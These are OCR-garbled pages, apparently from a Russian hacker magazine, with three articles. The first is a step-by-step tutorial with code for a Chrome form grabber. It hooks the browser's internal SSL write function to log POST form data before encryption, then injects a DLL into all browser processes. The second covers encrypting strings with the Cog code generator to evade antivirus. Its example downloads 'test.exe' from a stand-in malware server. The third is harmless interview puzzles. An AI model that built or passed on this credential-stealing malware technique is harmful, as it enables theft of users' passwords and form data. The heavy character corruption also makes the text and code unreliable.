ких проблем, достаточно поставить хук на стандартную экспорти- 
руемую функцию ѴѴ5А5епсІ. Сделать это довольно легко, и ма- 
териала в интернете на эту тему предостаточно. Поэтому лучше 
сосредоточиться на поиске функции, которая принимает данные 
форм в 551-соединении еще до шифрования. 

Мои попытки найти подобную функцию с помощью ОІІуОЬд 
закончились неудачей, поэтому я начал рыть в Ооодіе и сразу 
наткнулся на страницу с полным исходным кодом браузера 
[ доо.дІ/85дѴѴ2. ведь СЬготе — опенсорсный проект). 

В исходниках можно покопаться, указав в соответствующем 
поле формы поиска, что искать мы хотим в файлах С++. Первый 
запрос, который пришел мне в голову, — это «ззі зоскеі». 

В процессе поиска по этому запросу я сразу наткнулся на файл 
зз1_зоскеСЬ ( доо.дІ/бсѵѵОѵѵ ). но ничего интересного в нём не на- 
шел, зато в левой части экрана увидел дерево файлов с вкусными 
названиями. Меня интересовало всё, что имело в названии ззі 
и зоскеЗ а в особенности файлы ззІ_сІіепІ_зоскеІ_пзз.сс, зз1_ 
сІіепІ_зоскеІ_орепззІ.сс и ззІ_сІіепІ_зоскеІ_ѵѵіп.сс. Я знал, что 
в Ріге^ох перехватывается функция РР_ѴѴгіІе, и решил поискать 
и ее. В результате на первой же из появившихся двух страниц 
оказался файл ззІ_сІіепІ_зоскеІ_пзз.сс. Саму функцию я в нем так 
и не нашёл, однако теперь знал, откуда она вызывается. 

Просмотрев листинг, я наткнулся на функцию 
551СІіепі5оскеіѴѴіп::ѴѴгіІе, чем-то напоминающую РР_ѴѴгіІе. В дру- 
гих файлах, перечисленных выше, нашлись аналогичные функции: 
551СІіепі5оскеШреп551::ѴѴгіІе и 551СІіепі5оскеіѴѴіп::ѴѴгіІе. Следо- 
вало их проверить. 

Для этого требовался отладчик и адреса функций. Я восполь- 
зовался официальной инструкцией по настройке и отладке боодіе 
СЬготе, которая лежит по адресу доо.діЛѵуІІВ . 

Если вкратце, то для отладки Хрома нужно сделать следую- 
щее: 

1 . ЗапуститьѴѴіпОВС. 

2 . Открыть меню Рііе ^ 5утЬо1 Рііе РаіЬ. 

3 . Вставить в появившееся окошко следующую строку: 



5КѴ*с : \сосІе\5утЬоІ5*Ы:1;р : //тзсіі . тісгозо-Рі; . сош/сіоыпіоасі/ 

зѵшЬоІз ; 5КѴ*с : \сосІе\5ѵтЬоІ5*Ы:1:р : //сЬготіиш-Ьгоызег- 

зѵтзгѵ . сотшопсіаііазііога^е . ^оо^іеаріз . сот 

Здесь с:\сосІе\зутЬоІз — папка, куда складываются закачанные 
отладочные символы. 

4 . Открытьнесколькоокон изменюѴіеѵѵ. Рекомендую открытьокна 
Соттапб, Редізіегз и ОізаззетЫу. 

5 . ЗапуститьСЬготе. 

6 . ОткрытьменюРіІе^АиасМоа Ргосезз... 

7 . Выбрать любой сЬготе.ехе и нажать ОК. 

С помощью команды «х сЬготе*!*55ЕСІіепі5оскеіМ55::ѴѴгіІе» 
(которую надо вводить в окне СоттапсІ) я нашёл функцию 
55ЕСІіепі5оскеіМ55::ѴѴгіІе, а потом и 55ЕСІіепі5оскеіѴѴіп::ѴѴгіІе. По- 
ставил на них брейки (Ьгеакроіпіз) и зашёл в свой ОтаіІ-аккаунт. 

Программа прерывалась только на функции 55ЕСІіепі5оскеіМ55 
::ѴѴгіІе. 

Описание функции^ найденной в исходном коде 

ІПІ: 55ІС1іеп1:5оске1:М55 : :1лігі1:е( 

ІОВи-р-Рег^ Ьи■Р^ 

ІПІ: Ьц-Р Іеп. 

СОП5І : _Сотр1е1;іопСа11Ьаск& саІІЬаск 





Оставалось только выяснить, каким образом этой функции 
передается буфер с Р05Т-запросом. Логично предположить, что 
в переменной стипом ІОВиі'і'ег: 

с1аз5. МЕТ_ЕХРОКТ ІОВи-р-Рег : 

риЫіс Ьазе: : Ке-РСоип1;есІТЬгеасІ5а-Ре<ІОВи-р-Рег> 

і 

риЫіс : 

ІОВи-р-Рег() : 

ехріісіі: ІОВи-р-Рег(іп1: Ьи-Р-Рег зііе’) ; 

сЬаг* сІаІіаП { геііигп сіа1:а_: > 

рго1іес1:есІ : 

-Ргіепб сіа^ Ьазе : : Ке-РСои п1:есІТЬгеасІ5а-Ре<І0Ви-р-Рег> : 

ехріісіі: ІОВц-р-РегРсЬаг* сІаІіаѴ. 

ѵігіиаі ~ІОВц-р-РегП ; 

сЬаг* сіаіа : 





Так как структура сложная и непонятно, какое в действительно- 
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Рис. 3. 551-запрос найден 



сти смещение у данных, мне пришлось искать указатель на массив 
символов вручную. Для этого я в уже привычном ОІІуОЬд поставил 
брейк на функцию 551СІіепі5оскеіМ55::ѴѴгіІе (см. рис 1), при оста- 
новке взял первый параметр из стека и начал перебирать в нём 
каждый ОѴѴОРО (см. рис 2). 

Выяснилось, что третий ОѴѴОРО (то есть ІОВиІ'І'ег+8) представ- 
ляет собой указатель на массив символов (сЬаг*), содержащий 
НТТР5-запрос (см. рис 3). 

Далее в процессе отладки я обнаружил, что заголовок Р05Т- 
запроса и его данные передаются функции друг за другом, в от- 
дельных вызовах. Это легко понять, если установить условный 
брейк на функцию 551СІіепі5оскеіМ55::ѴѴгіІе (см. рис 4). Сначала 
вызывается функция и в буфере находится строка «Р05Т ...», а сле- 
дующий вызов уже содержит данные формы. Мы это обязательно 
учтем. 

ПОИСКАДРЁСА 

Теперь можно приступать к разработке, то есть к написанию 
модуля, который будет перехватывать найденную ранее функцию. 
Тут следует задуматься, как найти ее адрес программно, ведь 
она не экспортируется, а значит, обычным беіРгосАсІсІгезз здесь 
не обойтись. 

В процессе Хрома есть два РЕ-модуля, которые потен- 
циально могут содержать нашу функцию, — это сЬготе.ехе 
и сЬготе.сІІІ. Отладчик нам любезно сообщает, что адрес 
551СІіепі5оскеіМ55::ѴѴгіІе как раз лежит в пределах сІІІ. Что 
говорить, в ней вообще находится большая часть кода браузера. 



Здесь-то мы и будем программно искать адрес нашей неэкспорти- 
руемой функции. 

Оптимальным способом для этого в данном случае я считаю 
сигнатурный поиск. Сигнатурой функции (последовательностью 
байтов, по которой будет осуществляться поиск) выступят первые 
14 байт функции, они уникальны для модуля сЬготе.сІІІ и однознач- 
но указывают на нашу цель. 



Дизасм начальной части перехватываемой функции 

сІігоше ІсЗѲѲѲѲ! пе1і: : 55ІС1іеп1:5оске1:М55 : :1лігі1:е: 



02875а4с 55 


ризіі 


еЬр 


02875а4с1 8Ьес 


тоѵ 


еЬр^езр 


02875а4-р 51 


ризіі 


есх 


02875а50 53 


ризіі 


еЬх 


02875а51 56 


ризіі 


езі 


02875а52 57 


ризіі 


есіі 


02875а53 -Р-Р7508 


ризЬ 


сіыогсі р1;г [еЬр+8] 


02875а56 8Ь-Р1 


тоѵ 


езі^есх 


02875а58 ЗЗсІЬ 


хог 


еЬх^еЬх 



Скопируем первые байты функции и преобразуем их в массив 
байтов (ВУТЕ*), который функция поиска сигнатуры принимает 
в качестве параметра вместе с маской сигнатуры, хэндлом и раз- 
мером модуля. Маска служит для вычленения релятивных и абсо- 
лютных адресов в сигнатуре, потому как они могут меняться при 
каждом запуске. Байты адресов помечаются знаком «?», осталь- 
ные байты — знаком «х». 
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Формграббер для Зоодіе СЬготе 




Рис. 4. Условный брейк на 551СІіеп15оскеІМ55::ѴѴгіІе 

Вызов функции поиска осуществляется следующим образом: 

сбаг * 5і§п = "\х55\х8В\хЕС\х51\х53\х56\х57\хРР\х75\х08 
_\х8В\хР1\хЗЗ\хОВ" ; / / Сигна тура 55ІС1 іеп1:5оске1:М$5 : :1лігі1:е 



* Ма5к="хххххххххххххх"; // маска 

РІЛІОКР 551АСІГ = РіпсІРа1:1:егп(СбготеРІІ . 

Сбготе325І2е^ 

(ВУТЕ*^$і§п. 

Мазк); / / ББІАсІг - адрес 55ІС1іеп1:$оске1:М5$ : :1лігі1:е 

Сама функция выглядиттак: 

Ьооі Ра1:аСотраге( соп5І: ВУТЕ* рРаІіа, 

СОП5І: ВУТЕ * ЬМазк. соп5І: сбаг* з гМазк ^ 

і 

-РогС ; *5іМа5к; ++52Ма5к^ ++рРа1;а^ ++ЬМа5к ) 

( *52Ма5к == 'х' && *рРа1:а != *ЬМа5к ) 

ге1:игп -Раізе; 

} 

геііигп ( *52Ма5к ) == N1111: 

} 



РІЛІОКР РіпсІРа1:1:егп ( РІлІ ОКР сІыАсІсІгезз . 

РІЛІОКР сІыБіге. ВУТЕ* рЬМазк, сбаг* БіМазк ^ 

{ 

-Рог( РІЛІО КР і = N1111; і < сІыЗііе; і++ ) 

—[ 



ЩРа1:аСотраге( (ВУТЕ*) (сІыАсІсІге55+ і) ^ рЬМазк^ БіМазк) ) 

геііигп (РЫОКРи сІыАсІсІге55 + і : 

Л 

геііигп 0: 

} 

Кто-то может сказать, что этот метод із Рскіпд ипзІаЫе. Однако 
прошло полгода, версия Хрома неоднократно менялась, а сигнату- 
ра всё ещё работает. 

ПЕРЕХВАТ 

ОК, мы нашли адрес функции, теперь её нужно перехватить. Для 
этого подойдёт банальный сплайсинг. Для тех, кто в танке, сплай- 
синг — это метод перехвата функции, основанный на модификации 
ее кода. Самый простой вариант реализовать сплайсинг — за- 
менить, предварительно сохранив, первые 5 байт перехватывае- 
мой функции на «ЗМР твоя_функция». Для вызова оригинальной 
функции в этом случае нужно восстановить эти 5 байт из буфера, 
а после вызова снова изменить на МР. У этого метода есть суще- 
ственный недостаток. Дело в том, что если после восстановления 
начальной части оригинальной функции контекст переключится 
на другой поток, то он сможет вызвать функцию, минуя наш хук. 

Есть и другой способ сплайсинга — с так называемым «трам- 
плином». Как и в предыдущем способе, в нем в начало функции 
также встраивается ЗМР на хук, но на этом сходство заканчива- 
ется. Для вызова оригинальной функции при таком сплайсинге её 
начальная часть не восстанавливается. Этот способ не обладает 
указанным недостатком. 

При установке перехвата просто создается буфер с правами 
РА0Е_ЕХЕС1ЯЕ (устанавливаются с помощью ѴігІиаІРгоІесі), 
в который копируются первые 5 (размер джампа) или более байт 
из начала функции. Размер джампа может превышать 5 байт, так 
как нам нужно скопировать азпп-инструкции целиком, чтобы они 
смогли выполняться в другом месте. Чтобы определить, сколько 
в точности байтов копировать и где граница очередной инструк- 
ции, в нормальных сплайсинг-движках обычно используется 
дизассемблер длины. 

Так вот, в конец буфера со скопированными инструкциями до- 
писывается ЗМР, ведущий на [адрес функции + сумма длин первых 
инструкций]. Таким образом, для вызова оригинальной функции 
достаточно выполнить «ЗМР адрес_буфера». 

Несмотря на то что второй способ значительно стабильнее, 
в процессе исследований я реализовал первый способ, так как он 
проще (код смотри на диске]. 

Функция-перехватчик, записывающая формы в файл, для него 
вы глядит так: 



АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА 



Существуют и другие пути достижения нашей цели. Например, 
один из участников форума орепѵѵз под ником акасіетікег предложил 
перехватывать функцию РР_Ѵ\/гіІе (у него получилось-таки ее найти), 
что позволяет без особых усилий адаптировать под Сбготе исходники 
2еиз (само собой, в исследовательских целях). 

Сигнатура для поиска РК_1лІгі-1:е 

// сигн атура 

сбаг* 5і§п = "\х8Ь\х4с\х24\х04\х57\хе8\х00\х00\х00\х00\х8Ь 
_\х-Р8\х85\хТТ\х75\х05\х83\хс8\хТТ\х5Т\хсЗ\х53\х56\х8Ь\хЬ7 

\х38\х02\х00\х00" : 

// маска 

* Мазк="хххххх? ? ??ххххххххххххххххххх"; 



От себя могу добавить, что можно подменять РР_ѴѴгіІе в таблице 
методов, поскольку адрес этой функции берется из таблицы сотЬіпесІ_ 
теібосіз, что не отражается в исходниках, зато отчётливо проявляется 
в ѴѴіпОВО при трассировке функции 551СІіепі5оскеіМ55::0оРауІоасІ 
ѴѴгіІе (см. рис 5). При использовании этого способа исполняемый код 
не модифицируется, что позволяет обмануть некоторые механизмы 
детектирования перехватов. Чтобы его реализовать, нужно получить 
адрес таблицы сотЬіпесІ_теІбосІ5 и заменить в нем адрес РР_ѴѴгіІе 
по смещению ОСИ на адрес своей функции. ЗруЕуе использует 
другой метод перехвата, отличающийся от всех предыдущих. Он 
перехватывает ТгапзІаІеМеззаде, позволяя следить за тем, что вводит 
пользователь с клавиатуры, а также функцию 2\л/Реас1РіІе, которая 
выдаёт адреса посещаемых сайтов и запросы к ним (подробнее читай 
на доо.д1/хТХ9|) . В общем, есть из чего выбрать. 
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той 

ШООО 

юаоа 



Г : ; 

імзѵ еЬр.евр 

кцЬ еар. ОСЬ 

ВПСІ сіѵапі рЬх (вЬр-0СЬ],0 

тіэЬ еаі 

ривЬ «]і 

ноѵ в^і.еах 

аоѵ еах.сіиог^ рЪг [е^і+ОООН] 

■оѵ е(1х,[1вог(і рЪх [е(]і+0О41і] 

аоѵ еск.(іѵсг^ рЬх Геах+в] 

аоѵ ^^ еах.сііцог*^ рЬг Ге4і-і-1АСНі 

ривЪ евх 

ривЬ вех 

риаЬ е«х 

саіі СІМОГСІ рЬг [еві+ОСЬ] 



: 0Ъ'’0Ьсі4 00“іс1із:оте ІеЗОООО (сотЬіпе^ те^ЗюсІ 



I 



Рис. 5. СотЬіпесІ_теІЬосІ5 в 551СІіеп15оскеІМББ::0оРауІоасІѴѴгіІе 



сіесізрес (пакесП іп1: НоокесІ_$$ИлІгі1:е( 

РІЛІОКР Ьи-Р. 

ІПІ: Ьц-Р Іеп, 

ѵоісі* саІІЬаск) 

і 

5І:а1:іс Ьооі І5Ро5І:Ра1;а ; 



азт 

і 

рц5Іі еЬр: 

тоѵ еЬр^езр; 

ризіі еЬх; 

рц5Іі 05І: 

рц5Іі есіі: 

рц5Іі есх://аг^итеп1: 

і 



// Восстанавливаем начальную часть 

// оригинальной функции 

СІіготеНоок.ип5е1:$р1ісіп§0 : 

Тгие$$ИлІгі1:е = ($$ИлІгі1:еКІіготеНоок.6е1:НоокесІРипсП ; 



// Вызов ориг инальной ф ункции 
азт 

і 

рор есх: //аг^ишепі: 

тоѵ еах.саІІЬаск; 

рц5Іі еах; 

тоѵ еах. Ьц-Р Іеп : 

рц5Іі еах: 

тоѵ еах.Ьц-Р; 

ризИ еах: 

саіі Тгие$$Шгі1:е: 

ризіі еах; 

} 



// Возвращаем сплайсинг 
СІіготеНоок. КеЗрІісеП ; 



і±Д_5І;гпстр( (ІРС5ТК)*(сІт^**) (Ьи-Р+8) ^ 

"РО5Т",І5І:г1еп("РО5Т"))==0)) 

{ _ 



1лІгі1;еІо§( Іо§Рі1е^_*{сІтаг**}_(Ьи-Р+8) ) ; 

І5Ро5І:Ра1:а=1:гие: 

} 

( (5І;гпстр( (ІРС5ТК)*( **) (Ьи-р+8) ^ 
"6ЕТ". І5І:г1епГбЕТ"П==Ѳ) I I І5Ро5І:Ра1:а) 

{ 

1лІгі1:еІо^( Іо^ РіІе. * (сІіаг* *иЬи-Р+8^ ^ : 

І5Ро5І:Ра1:а=-РаІ5е: 

} 



{ 

рор еах: 

рор есІі: 

рор езі; 

рор еЬх: 

Іеаѵе: 

ге1; 0СІі; 

} 

} 

Модификатор сіесізресіпакесі) в данном случае использу- 

ется потому, что один из параметров передается не через стек, 
а через регистр есх. Это значит, что нам следует сохранить его, 
прежде чем он изменится, и восстановить до вызова оригиналь- 
ной функции. 

Ничего удивительного в подобной передаче параметров 
нет — это так называемый іЫзса II, используемый для вызова 
методов класса (ведь наша функция представляет собой метод 
ѴѴгіІе класса 551СІіепі5оскеЖ55). Через регистр есх таким 
образом передается адрес объекта, для которого вызывается 
метод. 

ЗАКЛЮЧЕНИТ 

Остается только внедрить код-перехватчик в процесс браузера 
(я использовал классическое 011-инжектирование) — и готово! 
Однако у Ооодіе СЬготе много процессов, а перехватывать функ- 
ции нужно строго в определенном, имеющем визуальную форму 
с названием активной вкладки. В других процессах функция 
просто не будет использоваться. В принципе, чтобы не замо- 
рачиваться с поиском нужного процесса Хрома, можно просто 
внедрить модуль во все процессы. Хуже от этого не будет. ^ 
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РАСШИРЯЕМ 

ВОЗМОЖНОСТИ 

ПРЕПРОЦЕССОРА 

С/С++ С ПОМОЩЬЮ 

СТОРОННЕГО 

КОДОГЕНЕРАТОРА 



Одной из таких задач является банальное скрытие текстовых 
строк в коде программы. Скрывать их действительно нужно 
— они однозначно помогают аверам и исследователям, 
которым только дай поизмываться над очередным вирусным чудом. 
Другое дело — как? Ну, шифровать, но как сделать это удобно? Пред- 
ставь, естьу тебя программа с воттаким вот вызовом (утрирую): 

1)КІОоып1оасІТоРі1е(МІЛІ^ "Іі1:1;р://та1ыаге5егѵег.сот/1;е5І:.ехе"^ 
"С:\\-Се5^.ехе". 0. МШІУ. 

Обе строки, передаваемые в параметрах к функции 
СІРЮоѵѵпІоасІТоРіІе, при сборке программы прекрасно поместятся 
в секцию .гсіаіа или .баіа в открытом виде. Хоть Ьех-редактором от- 
крывай. Вот кодеры и извращаются, пишут отдельную программу, 
шифрующую строки, а потом подставляют значения с функцией- 
декриптором как-нибудь так: 




При разработке хакерских программ 
и утилит (особенно вирусного толка) часто 
встречаются задачи, которые нереально 
решить силами обычного препроцессора Си. 
Это задачи, требующие вычислений, пусть 
и тривиальных, но еще ДО компиляции. 
Сегодня мы обсудим один более или менее 
универсальный способ решения подобных 
задач с помощью Питона. 




Процесс смешанной разработки 



У}Щ}1 

Сайт проекта Сод 
на сервера автора: 
песІЬаісЬеІсІег.сот/ 
сосіе/сод . 

ІШД 

Чтобы не копировать 
в каждый файл 
твоего проекта 
функции, 
описываемые 
в первом 
внедряемом 
фрагменте, можно 
засунуть их в свой 
руНіоп-модуль 
и использовать его 
вместо модуля сод. 



ЦКІРоып1оасІТоРі1е( 







Оесгур1;("\х0Е\х12\х12\х16\х5С . 




Оесгур1;("\х25\х5С\хЗА\х12\х03 . 




0. 




N011 V. 





Всё бы ничего, только вручную шифровать и вставлять каждую 
строчку — это геморрой. Было бы в миллион раз приятнее напи- 
сать какой-нибудь макрос, который прямо тутже, прозрачно для 
тебя, шифровал бы строку. Однако препроцессор Си в современных 
компиляторах поддерживает очень ограниченный набор директив, 
с помощью которого строку целиком не зашифровать, как ни пытай- 
ся. Чтобы не шифровать строки руками (а также автоматизировать 
другие подобные процессы), надо придумать какой-то костыль. 

КОДОГЕНЕРАТОР НА РУТНЖ 

Несмотря на то, что хакеры всегда и везде любят изобретать вело- 
сипед, в этой статье мы этого делать не будем, а воспользуемся го- 
товым и уже заточенным под наши цели продуктом-костылем под 
названием Сод [бир ://рурі,.[ ' 'Шоп.огд/рурі/содарр ). Автор называет 
его инструментом для кодогенерации, позволяющим использовать 
небольшие фрагменты программ на Питоне в качестве генераторов 
в исходниках. В общем, так и есть, Сод'а можно натравить на твой 
сорец, и он найдет в нем отмеченный специальными метками код 
на Питоне, выполнит его и вставит результат обратно в исходный 
код. К примеру, скормим Сод'у воттакой файлик: 

// Это обычный файл С++ 

/* [ [[со е 
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и целого Си мало 



ішрогі: сод 

■РпатеБ = [ '0о5оте1;Іііп§' ^ ' 0оАпо1:ІіегТІііп§ ' ^ ' 0оІа5І;ТІііп§ ' ] 
-Рог -Рп іп -РпашеБ: со§.ои1;1("ѵоісІ %5();" % -Рп) 

иш 

// [[[епгі]]] 



В результате файл будет модифицирован вот так: 

// Это обычный файл С++ 

/*[[[сое 

Ішрогі: со§ 

■Рпашез = [ '0о5оте1:Іііп§' ^ ' 0оАпо1:ІіегТІііп§ ' ^ ' 0оІа5І:ТІііп§ ' ] 
■Рог -Рп іп -Рпатез: со§.ои1:1("ѵоісІ %в{);" % -Рп) 

іті 

ѵоісі Ро5оше1:Іііп^П : 

ѵоісі РоАпоіІіегТІііп^П : 

ѴОІСІ РоІа5І:ТІііп§() : 

// [[[епсі]]] 



Между метками [[[со§ и ]]] располагается код на Питоне, 
генерирующий код на Си, который будет вставлен в строки между 
метками ]]] и [[[епсі]]]. Если Сод запустить заново, то он сначала 
удалит старый сгенерированный код на Си, а потом снова выполнит 
код генератора и запишет новый результат в файл. 

Какты, наверное, заметил, помимо специальных маркеров код 
на Питоне еще выносится в комментарий. Это нужно для того, что- 
бы компилятор Си не пытался скомпилировать еще и код на Питоне 
— у него не получится. 

Для вывода результата кодогенерации используются функции 
оиі и оиіі (аналогичен оиі, только добавляет перевод строки в ко- 
нец) модуля сод. 

Если в исходном коде есть несколько фрагментов на Питоне, 
они будут выполняться как один руіЬоп-скрипт. Следовательно, 
необязательно везде делать импорт модуля и тому подобное. 

ШИФРОВАНИЕ СТРОК 

Давай теперь попробуем написать скрипт для скрытия текстовых 
строк из кода программы. В начале нашего исходника на Си за- 
грузим модуль Сод и определим функцию шифрования — пусть это 
будет обычный хог: 



Выполнив команду руібоп.ехе со§.ру -г іезі.срр, где іезі. 
срр — это наш файл, мы получим исходный код с уже зашифрован- 
ными строками! 

ЦКІРоып1оасІТоРі1е( 

мин. 

//[[[со ^ Епсгур1:("Іі1:1:р://та1ыаге5егѵег.сот/1:е5І:.ехе") ] ] ] 
РесгѵріГ \0х0Е\0х12\Ѳх12\Ѳх16\0х5С . . . ") 

/*[ГГепс1111*/. 

// [ [ [ со§ Епсгурі ( " С : \\1:е5І: . ехе" ) ] ] ] 

Ресгѵр1іГ\0х25\0х5С\0хЗА\0х12\0х03 . . . 

/*[[[епс1111*/. 

0. 

миШ; 

Чтобы не запускать кодогенератор вручную, можно в ѴізиаІ 
Віисііо добавить его в список команд, вызываемых перед компи- 
ляцией твоего проекта. Теперь если ты захочешь изменить зна- 
чение шифруемой строки, достаточно просто поменять параметр 
Епсгурі в сод-скрипте, вручную вставлять ничего не придется. 



ВІМ2Н 

При использовании такого мощного инструмента как Питон, воз- 
можностей для кодогенерации открывается уйма. Например, Сод 
может раз и навсегда заменить утомительное использование 
Ьіп2Ь для внедрения бинарных файлов в исходный код програм- 
мы. Для этого достаточно реализовать функцию Ьіп2Ь и вставить 
ее, как и в примере выше, в первый фрагмент кода на Питоне: 

сіе-р Ьіп21і(б1епате. ѵаіиепаше): 

сіаіа = ореп(б1епаше. 'гЬ'^.геасІП 

со§.ои1:1( ’ВУТЕ %з[] = { ' % ѵаіиепаше) 

-Рог Ьѵіе іп сіаіа: 

со§.ои1:( '0х%02Х^ ' % огсІ(Ьу1:е)) 

сое.ои1:1( ' }' ) 

со§.ои1:1( 'ОІЛІОКО %5_5І2е = %сі; ' % (ѵаіиепаше^ 1еп(сіа1:а))) 

Теперь, когда мы захотим засунуть бинарник в наш сорец (это 
пригодилось бы в статье про разработку РЕ-упаковщика), то на- 
пишем так: 

//[[[со§ Ьіп2Іі ("1:е5І:.Ьіп" . "іезі:")]]] 

/*ГГГепсІ111*/ 



/* [ [[со е 

ішрогі: с о^ 



кеу = 0x66 

сІе-Р ЕпсгуріРБіг^ : 

со^.оиіР ' РесгѵріР " ' ) 

со§.ои1:("" .доіп( [ ' \\ ' -г ("0х%02Х" % (огсі(сііаг)^кеу) ) 

Тог сРіаг іп зТг])) 



со^.оиТС ) 



]]] 

[[[епсі]]] */ 



Теперь можем заменить строковые параметры 
ІІРЕОоѵѵпІоасІТоРіІе на вызовы Епсгурі: 



икіОоып1оасІТоРі1е( 

мин, 

//[ [ [со^ Епсгурі ("Іі1:1:р://ша1ыаге5егѵег.сош/1:е5І:. ехе" ) ] ] ] 

/*[[[епсі111*/. 

//[[[со§ Епсгурі ( "С ЛХіезІ: . ехе" ) ] ] ] 

/ПГГепсІІП*/. 

0. 

МШП: 



Что преобразуется в нечто вроде этого: 

//[[[со§ Ьіп2Іі("іе5і.Ьіп"^ "іезі")]]] 

ВУТЕ І65І[] = { 

0x23. 0x69, 0х6Е, 0x63. 0х6С ... 

// длинный буфер 

} 

ОІЛІОКО іе5і_5І2е = 7079; 

/*[ГГепсІ111*/. 

В функцию Ьіп2Ь можно добавить функцию шифрования или 
сжатия — по вкусу. 

ЭТО НЕ КОНЕІІ 

Кодер, занимающийся вирусами, может придумать миллион очень 
милых применений стороннему кодогенератору. Это может быть 
рандомизация тех или иных вызовов, разбавление кода высоко- 
уровневым мусором, подсчет хешей имен функций для соответ- 
ствующего поиска АРІ и так далее. Можно даже с помощью СогеРу 
генерировать ассемблерный код, тут же его как-нибудь видоиз- 
менять и вставлять в уже скомпилированном виде — фантазия 
ограничивается только возможностями Питона со всем многооб- 
разием его модулей. ^ 
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Задачи на 
собеседованиях 



ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, 
КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ 



В этом выпуске я добавил к обещанным в 
прошлый раз задачам шесть задачек на 
сообразительность и логику. Как показывает 
практика, их очень любят работодатели. 
Конкретно этот набор логических задач мне 
дали на собеседовании в одной крупной 
интернет-компании. На решение всего перечня 
отводилось 40 минут — я почувствовал себя 
как в школе на контрольной... 



УСЛОВИЕ 

Встретились два старых друга, не видевшиеся уже довольно давно. 
Оба когда-то вместе учились на Физтехе. Вот их диалог: 

— Я слышал, у тебя дети появились. 

— Да, три сына. 

— И сколько им лет? 

— Ну... В сумме тринадцать! 

— Хм... Загадками хочешь говорить? Ну ладно. И что еще можешь 
сказать? 

— Если их возрасты перемножить, получится как раз столько, 
сколько окон у во-о-он того дома. 

— Но этого всё еще мало! 

— Могу добавить, что мой старший сын рыжий. 

— Ну, теперь совсем другое дело. Им ... (далее следует ответ) 

— Правильно! 

Сколько же лет было каждому сыну? 
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Задачи на собеседованиях 



РЕШЕНИЕ 

Возможно, первый же уточняющий вопрос, который возникнету тебя 
в связи с этой задачей, будет о том, как считать окна «у во-о-он того 
дома». Ответ: это известно лишь участникам беседы. :) Но мы не бу- 
дем унывать и составим все возможные варианты количества окон. 
Пока главное условие — сумма множителей должна быть равна 13: 



1 * 1 * 11 = 11 



1 


* 2 


* 


10 = 20 


1 


* 3 


* 


9 


= 27 


1 


* 4 


* 


8 


= 32 


1 


* 5 


* 


7 


= 35 


1 


* 6 


* 


6 


= 36 


2 


* 2 


* 


9 


= 36 


2 


* 3 


* 


8 


= 48 


2 


* 4 


* 


7 


= 56 


2 


* 5 


* 


6 


= 60 


3 


* 3 


* 


7 


= 63 


3 


* 4 


* 


6 


= 72 


3 


* 5 


* 


5 


= 75 


4 


* 4 


* 


5 


= 80 



Вариантов оказалось не так много, их можно выписать за не- 
сколько минут. Заметь, что произведения возрастов совпадают 
только в двух случаях: 1*6*6 и 2*2*9. Получается, что если бы здание 
имело любое предложенное количество окон, кроме 36, то ответ 
можно было бы дать сразу, однако один из друзей сказал, что «этого 
всё еще мало». Это однозначно подводит нас к мысли, что сыновьям 
либо один год, шесть лет и шесть лет, либо два года, два года и девять 
лет. Далее наш папаша выдает следующую фразу: «Могу добавить, 
что мой старший сын рыжий». Сначала она выглядела совершенно 
бесполезной, но сейчас всё стало понятно. Главное слово в ней не 
«рыжий», как могло показаться на первый взгляд, а «старший». Из 
наших вариантов (1-6-6 и 2-2-9) только в одном имеется старший сын. 
Следовательно, правильный ответ — два года, два года и девять лет. 

УСЛОВИЕІ 

Дан большой массив данных в файле (миллион записей). Задача: 
загрузить данные в таблицу, используя язык программирования 
РуіЬоп. 

РЕШЕНИЕ 

В качестве СУБД для разнообразия используем Огасіе. Для работы 
с ней в Питоне предусмотрен специальный модуль сх_0гас1е, кроме 
него на нашем компьютере обязательно должна быть клиентская 
часть СУБД Огасіе. 

ітрогі: сх ОгасІе 



# Соединяемся с базой 

сопп = сх_О гас1е.соппес1:( ' 5Ѵ5І:е пі/дыег1:у@ХЕ ' ) 
сиг = сопп.сиг50гП 



# Через мех анизм итераторов построч но добавляем записи из 
файла в таблицу 

-Рог Ііпе іп ореп( 'біе.ііхі: ' ) : 

сиг.ехеси1:е("ІМ5ЕКЦ[МТО 1;е5І; ѴАШЕ5 (:з)% 5=1іпе) 



# Сохраняем изменения^ закрываем соединение 

сиг.ехеси1;е( ’СОММІТ' ) 

сиг.сІ05е() 

Хочу отметить, что при добавлении данных в более сложные 
таблицы с индексами и ключами лучше предварительно отключить 
их на время, так как на их пересчет можетуйти много времени. В 
качестве альтернативы можно загружать данные через временную 
таблицу. 



УСЛОВИЕ 

Естьтри урны с шарами, как в задачках по теории вероятности. На 
первой написано «ЧЕРНЫЕ», на второй — «БЕЛЫЕ», на третьей — 
«ЧЕРНЫЕ И БЕЛЫЕ». В одной, соответственно, лежат белые шары, 
в другой — черные, в оставшейся — и черные, и белые. Однако все 
надписи на урнах заведомо ложны. Разрешается достать только 
один шар только из одной урны. Как определить, в какой урне какие 
шары лежат? 

РЕШЕНИЕ 

Из того, что надписи заведомо ложны, можно сделать следующие 
выводы: 

• вурне«ЧЕРНЫЕ»либотолькобелыешары, л ибо черные и белые; 

• в урне «БЕЛЫЕ» л ибо только черные шары, либо черные и белые; 

• в урне «ЧЕРНЫЕ И БЕЛЫЕ» л ибо только белые шары, л ибо только 
черные. 

Если мы возьмем шар из урны «ЧЕРНЫЕ И БЕЛЫЕ» и он окажется 
черным, значит, в этой урне ТОЛЬКО черные шары. Это однозначно 
указывает на то, что: 

• в урне «БЕЛЫЕ» черные и белые шары, так как только черные у нас 
вурне«ЧЕРНЫЕИ БЕЛЫЕ»; 

• в урне «ЧЕРНЫЕ» только белые шары, так как черные и белые в 
урне«БЕЛЫЕ». 

Ну и соответствующие выводы можно сделать, вынув не черный 
шар, а белый. Таким образом, возможных распределений шаров 
всего два: 

1 . БЕЛЫЕ ЧЕРНЫЕИ БЕЛЫЕ ЧЕРНЫЕ 

2 . ЧЕРНЫЕИБЕЛЫЕ ЧЕРНЫЕ БЕЛЫЕ 

В зависимости оттого, какой шар мы вынем из третьей урны, 
будет иметь место либо первое, либо второе. 

УСЛОВИЕ 

В базе данных Огасіе имеются две таблицы с одинаковым набором 
колонок. Выведите данные, которые есть в одной таблице, но от- 
сутствуют в другой. 

РЕШЕНИЕ 

Для ясности определимся с форматами таблиц. Следующие два 
запроса создают две одинаковые таблицы с именами Іезіі и 1езі2, 
